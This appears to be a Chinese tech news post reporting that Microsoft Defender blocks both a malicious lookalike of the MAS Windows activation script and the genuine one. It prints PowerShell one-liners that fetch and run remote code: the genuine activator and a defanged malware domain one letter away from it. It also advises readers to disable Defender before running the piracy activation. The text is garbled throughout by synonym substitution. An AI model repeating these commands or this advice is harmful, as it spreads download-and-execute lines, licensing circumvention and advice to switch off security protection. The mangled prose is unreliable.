然而不幸的是微软在处理规矩时似乎出现不测,因为真正的 MAS 激活对象如今同样被拦截,这导致用户在 PowerShell 中履行激活敕令时将会因为被拦截而直接报错。
图片来源:@Massgrave
那怎么知道微软不是有意要封杀真的 MAS 激活对象呢?在 Microsoft Defender 拦截记录里,微软提到的名称是 Trojan:PowerShell/FakeMas.DA!MTB
推敲到关于虚假 MAS 激活对象是比来才出现的并且 MAS 开辟团队也在 X/Twitter 上颁布了这件事,再加上微软的拦截动作也是近期开端的,这根本可以断定微软压根没想着拦截真正的 MAS 激活对象。
只是正版和恶意软件版仅在域名商有个字母的差别:
# 真正的 MAS 激活对象敕令如下irm https://get.activated.win | iex# 携带病毒的假装版本域名后少了个 dirm hxxps://get.activate.win | iex
微软在处理拦截规矩时应当是掉慎将真正的 MAS 激活对象域名给拦截了,手头临时没有虚拟机没法测试,不然蓝点网高低得尝尝垂纶版是否被成功拦截,切切别是微软拦截错了放行垂纶版把真正的 MAS 激活对象给拦截了。
如今摆在用户面前的问题是,Microsoft Defender 默认情况是开启的,是以用户在履行激活敕令前必须先辈入安然中间禁用这种安然防护,待成功激活后再开启各类安然防护即可。
这里还须要再次强调请履行激活敕令时必定要认准域名,不然封闭防护的同时还履行垂纶版激活敕令那体系可能就会被安装恶意软件,后续可能会造成数据泄漏等安然问题。
发表评论 取消回复